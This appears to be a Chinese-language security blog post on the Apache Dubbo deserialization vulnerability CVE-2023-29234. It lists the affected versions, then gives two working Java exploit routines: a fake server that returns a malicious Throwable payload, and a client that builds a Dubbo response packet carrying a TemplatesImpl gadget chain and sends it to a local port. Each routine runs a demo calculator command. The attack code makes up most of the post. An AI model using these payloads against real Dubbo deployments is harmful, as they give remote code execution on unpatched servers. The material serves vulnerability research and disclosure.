本文最后更新于 2024年8月27日 上午
Apache Dubbo 反序列化漏洞(CVE-2023-29234) Apache Dubbo 是一款微服务开发框架,它提供了RPC通信与微服务治理两大关键能力。使应用可通过高性能的 RPC 实现服务的输出和输入功能,可以和 Spring 框架无缝集成。 Apache Dubbo 某些版本在解码恶意包时存在反序列化漏洞,远程攻击者可利用该漏洞执行任意代码。
影响版本 1 2 3 .1 .0 <=Apache Dubbo<=3 .1 .10 3 .2 .0 <=Apache Dubbo<=3 .2 .4
利用方式一:fake server 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 @Override protected void encodeResponseData(Channel channel, ObjectOutput out , Object data, String version ) throws IOException { Result result = (Result) data; boolean attach = Version.isSupportResponseAttachment(version ); Object th = null ; try { th = getThrowablePayload("open -a calculator" ); } catch (Exception e) { } if (th == null ) { Object ret = result.getValue(); if (ret == null ) { out .writeByte(attach ? RESPONSE_NULL_VALUE_WITH_ATTACHMENTS : RESPONSE_NULL_VALUE); } else { out .writeByte(attach ? RESPONSE_VALUE_WITH_ATTACHMENTS : RESPONSE_VALUE); out .writeObject(ret); } } else { out .writeByte(attach ? RESPONSE_WITH_EXCEPTION_WITH_ATTACHMENTS : RESPONSE_WITH_EXCEPTION); out .writeObject(th); } if (attach) { result.getObjectAttachments().put(DUBBO_VERSION_KEY, Version.getProtocolVersion()); out .writeAttachments(result.getObjectAttachments()); } }
利用方式二:客户端打服务端 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 public static void main (String[] args) throws Exception { ByteArrayOutputStream boos = new ByteArrayOutputStream (); ByteArrayOutputStream nativeJavaBoos = new ByteArrayOutputStream (); Serialization serialization = new NativeJavaSerialization (); NativeJavaObjectOutput out = new NativeJavaObjectOutput (nativeJavaBoos); byte [] header = new byte [HEADER_LENGTH]; Bytes.short2bytes(MAGIC, header); header[2 ] = serialization.getContentTypeId(); header[3 ] = Response.OK; Bytes.long2bytes(1 , header, 4 ); Object exp = getThrowablePayload("open -a calculator" ); out.writeByte(RESPONSE_WITH_EXCEPTION); out.writeObject(exp); out.flushBuffer(); Bytes.int2bytes(nativeJavaBoos.size(), header, 12 ); boos.write(header); boos.write(nativeJavaBoos.toByteArray()); byte [] responseData = boos.toByteArray(); Socket socket = new Socket ("127.0.0.1" , 20880 ); OutputStream outputStream = socket.getOutputStream(); outputStream.write(responseData); outputStream.flush(); outputStream.close(); } protected static Object getThrowablePayload (String command) throws Exception { Object o = Gadgets.createTemplatesImpl(command); ObjectBean delegate = new ObjectBean (Templates.class, o); return delegate; }
漏洞来源